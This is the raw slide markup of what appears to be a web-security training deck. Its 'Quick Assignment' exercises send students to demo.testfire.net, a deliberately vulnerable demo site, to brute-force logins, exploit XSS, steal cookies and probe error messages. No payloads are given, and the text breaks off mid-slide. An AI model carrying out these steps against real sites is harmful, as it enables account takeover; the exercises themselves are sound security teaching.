        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68121602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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Assignment#1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit a vulnerable website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try to crack the UN &amp; PWD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Login to the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://demo.testfire.net/login.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hint: Refer Security Misconfiguration vulnerability &amp; Brute Force attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12389255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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{113BA449-07BA-4CCE-9D65-C0E7AEB726BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2276475" y="152400"/>
            <a:ext cx="7105650" cy="4800600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175502653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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Assignment#2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit a vulnerable website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try to exploit CSS/XSS vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://demo.testfire.net/login.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hint: Use CSS/XSS payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63658240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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Assignment#3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit a vulnerable website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find out which text fields are CSS/XSS vulnerable or not sanitizing the data and passing it as it is to back-end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://demo.testfire.net/login.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hint: Use CSS/XSS payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154638731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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Assignment#4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit a vulnerable website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steal the cookie using CSS/XSS attack in front-end and back-end url: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://demo.testfire.net/login.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hint: Use CSS/XSS payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227542267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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Assignment#5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit a vulnerable website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find out if application throws any hints or clues on technical errors, when user inputs invalid test data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
